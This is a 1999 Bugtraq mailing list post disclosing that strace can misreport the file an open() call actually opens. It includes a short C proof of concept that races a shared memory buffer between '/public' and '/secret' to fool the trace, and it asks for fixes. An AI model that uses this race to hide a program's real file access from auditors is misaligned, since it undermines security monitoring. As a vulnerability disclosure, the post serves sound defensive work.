Bugtraq mailing list archives
strace can lie
From: pavel () SUSE CZ (Pavel Machek)
Date: Sat, 25 Dec 1999 23:04:52 +0100
Hi! When you see snippet from strace, that says: open("/etc/passwd", O_RDONLY) = 3 Do you trust it? You should not. Malicious program could open _any_ file on filesystem with this syscall. Here is example of such malicious program: void main(void) { char *c = 0x94000000; open( "/tmp/delme", O_RDWR ); mmap( c, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, 3, 0); *c = 0; if (fork()) { while(1) { strcpy( c, "/public" ); strcpy( c, "/secret" ); } } else while (1) open( c, 0 ); } Depending on races, /public or /secret is printed with strace. This can be reproduced even on UP and easiest way to do so is to make /public file readable, and then look if you get [pid 224] open("/public", O_RDONLY) = 718 [pid 224] open("/secret", O_RDONLY) = 719 [pid 224] open("/public", O_RDONLY) = 720 snippet like this. It is impossible for kernel to open non-existent file; that means that strace printed something that did not actually happen. Any ideas how to get rid of this problem? It is nasty. It is very nasty and makes strace unusable for anything security-sensitive. Pavel PS: You don't need two processes sharing memory. Memory-mapped file will do the job. This was just illustration. -- I'm pavel () ucw cz. "In my country we have almost anarchy and I don't care." Panos Katsaloulis describing me w.r.t. patents me at discuss () linmodems org
Current thread:
- strace can lie Pavel Machek (Dec 25)
- Re: strace can lie Sampo Savolainen (Dec 28)
- Local / Remote D.o.S Attack in Savant Web Server V2.0 WIN9X / NT / 2K Ussr Labs (Dec 28)
- <Possible follow-ups>
- Re: strace can lie der Mouse (Dec 27)
- strace can lie Misha Dankov (Dec 28)